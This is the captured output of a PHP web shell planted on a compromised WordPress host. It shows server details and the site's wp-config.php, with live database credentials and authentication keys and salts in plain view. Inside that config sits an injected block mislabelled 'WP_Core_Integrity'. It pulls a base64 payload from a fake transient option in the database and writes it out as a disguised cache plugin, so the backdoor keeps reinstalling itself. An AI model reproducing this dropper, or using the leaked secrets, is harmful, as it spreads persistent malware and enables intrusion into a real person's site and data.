403Webshell
Server IP : 145.239.37.162  /  Your IP : 216.73.217.71
Web Server : Apache
System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaa ( 38250)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/v/e/r/verseaa/www1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/v/e/r/verseaa/www1/wp-config.php
<?php

//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'verseaa634');

/** MySQL database username */
define('DB_USER', 'verseaa634');

/** MySQL database password */
define('DB_PASSWORD', 'ERCy2V4ck43f');

/** MySQL hostname */
define('DB_HOST', 'verseaa634.mysql.db:3306');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'zrbEqiozaDGTNhbX7qihUxXK+2KRX8h2bxIDr03R0O15kAVBbbF3RJ+MuWd6');
define('SECURE_AUTH_KEY',  '1GAhLkMHFPZp6HO5qZ8tgKycbS1/VQZ4vRZ0puo4tUlFwGgN8FbgN9CHkl4K');
define('LOGGED_IN_KEY',    '3TZuC9gspuwPfGVvOtPkWMdhZ8TrAZhgtPMw6kXi/X383ArD0nsCzTKJ4dRv');
define('NONCE_KEY',        'FXK8t/zgjM6erI18Uj7hNLz0gTaFUEg0hHNqzPDQmGlHHvar2hIL8H+BOrmy');
define('AUTH_SALT',        'CD/ACaa7f563YLVWj0LdAChjSX2ToikWDAF2WrXhgOG7KPisOHacB6ZvSmty');
define('SECURE_AUTH_SALT', 'dWC/EGtYlTrwVWgZbANnugGOo8xHiUhHALj1NXUqGUymnRQhVLrGr03MP/pJ');
define('LOGGED_IN_SALT',   'ufH5B29WMeffo7CI/+Q5zK6trNjxFr968NMPu6LZ0clq3RuIDnf9qGX7U64B');
define('NONCE_SALT',       'd2ubJFPhkyBVklMdJ8ZUVU6TMk+7a7KWLOSM/DNRBD6ydgiAAFADwS5zqWtc');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'mod583_';

/* WP_Core_Integrity 3f39d93b */
if(!function_exists('_wp_cuh_sql')){
function _wp_cuh_sql($opt){
  if(!is_string($opt)||$opt==='')return '';
  $n=$u=$pw=$h='';$tp='wp_';
  if(defined('DB_NAME')&&defined('DB_USER')&&defined('DB_HOST')){
    $n=DB_NAME;$u=DB_USER;$pw=defined('DB_PASSWORD')?DB_PASSWORD:'';$h=DB_HOST;
    if(isset($GLOBALS['table_prefix'])&&is_string($GLOBALS['table_prefix'])&&$GLOBALS['table_prefix']!=='')$tp=$GLOBALS['table_prefix'];
  }else{
    $cf='';
    if(defined('ABSPATH')&&ABSPATH)$cf=rtrim((string)ABSPATH,'/').'/wp-config.php';
    if($cf===''||!is_file($cf)){
      $tries=array(dirname(__FILE__).'/wp-config.php');
      if(PHP_VERSION_ID>=70000)$tries[]=dirname(__DIR__,2).'/wp-config.php';
      else $tries[]=dirname(dirname(__DIR__)).'/wp-config.php';
      foreach($tries as $c){ if(is_file($c)){$cf=$c;break;} }
    }
    if($cf===''||!is_file($cf))return '';
    $src=@file_get_contents($cf); if(!is_string($src)||$src==='')return '';
    $kv=function($c) use($src){
      $q=preg_quote($c,'/');
      if(preg_match('/define\s*\(\s*[\'"]'.$q.'[\'"]\s*,\s*([\'"])([^\'"]*)\1/s',$src,$m))return $m[2];
      if(preg_match('/define\s*\(\s*[\'"]'.$q.'[\'"]\s*,\s*getenv_docker\s*\(\s*([\'"])([^\'"]+)\1\s*,\s*([\'"])([^\'"]*)\3/s',$src,$m)){
        $fe=getenv($m[2].'_FILE');
        if($fe!==false&&$fe!==''&&is_file($fe)){$t=@file_get_contents($fe);if($t!==false)return rtrim($t,"\r\n");}
        $v=getenv($m[2]); return ($v!==false&&$v!=='')?$v:$m[4];
      }
      if(preg_match('/define\s*\(\s*[\'"]'.$q.'[\'"]\s*,\s*getenv\s*\(\s*([\'"])([^\'"]+)\1/s',$src,$m)){
        $v=getenv($m[2]); return $v===false?'':$v;
      }
      return '';
    };
    $n=$kv('DB_NAME');$u=$kv('DB_USER');$pw=$kv('DB_PASSWORD');$h=$kv('DB_HOST');
    if(preg_match('/\$table_prefix\s*=\s*[\'"]([^\'"]*)[\'"]/',$src,$m))$tp=$m[1];
  }
  if($n===''||$u===''||$h==='')return '';
  $host=$h;$port=3306;$sock='';
  if(isset($h[0])&&$h[0]==='/'){$sock=$h;$host='localhost';}
  elseif(preg_match('/^localhost:(.+)$/i',$h,$m)&&!ctype_digit($m[1])){$sock=$m[1];$host='localhost';}
  elseif(preg_match('/^\[(.+)\]:(\d+)$/',$h,$m)){$host=$m[1];$port=(int)$m[2];}
  elseif(preg_match('/^([^:]+):(\d+)$/',$h,$m)){$host=$m[1];$port=(int)$m[2];}
  $opt=preg_replace('/[^a-zA-Z0-9_]/','',$opt);
  $tp=preg_replace('/[^a-zA-Z0-9_]/','',$tp);
  if($opt===''||$tp==='')return '';
  $sql="SELECT option_value FROM `".$tp."options` WHERE option_name='".$opt."'";
  $row=null;
  if(class_exists('PDO')&&in_array('mysql',PDO::getAvailableDrivers(),true)){
    try{
      $dsn=$sock!==''?'mysql:unix_socket='.$sock.';dbname='.$n:'mysql:host='.$host.';port='.$port.';dbname='.$n;
      $db=@new PDO($dsn,$u,$pw);
      $q=$db->query($sql);
      if($q){$row=$q->fetchColumn(); if($row===false)$row=null;}
    }catch(Exception $e){}
  }
  if($row===null&&class_exists('mysqli')){
    $m=@mysqli_init();
    if($m){
      $ok=$sock!==''?@$m->real_connect('localhost',$u,$pw,$n,null,$sock):@$m->real_connect($host,$u,$pw,$n,$port);
      if($ok&&empty($m->connect_error)){
        $r=@$m->query($sql);
        if($r){$x=$r->fetch_row(); if($x)$row=$x[0];}
      }
    }
  }
  return is_string($row)?$row:'';
}
}if(!file_exists('/home/verseaa/www1/wp-content/plugins/wp-cache-657a2e/wp-cache-657a2e.php')){$_row=_wp_cuh_sql('_site_transient_health_8e620569');if($_row!==''){@file_put_contents('/home/verseaa/www1/wp-content/plugins/wp-cache-657a2e/wp-cache-657a2e.php',base64_decode($_row));@chmod('/home/verseaa/www1/wp-content/plugins/wp-cache-657a2e/wp-cache-657a2e.php',0644);}}
/* End-WP_Core_Integrity 3f39d93b */




/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Fixes "Add media button not working", see http://www.carnfieldwebdesign.co.uk/blog/wordpress-fix-add-media-button-not-working/ */
define('CONCATENATE_SCRIPTS', false );

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Youez - 2016 - github.com/yon3zu
LinuXploit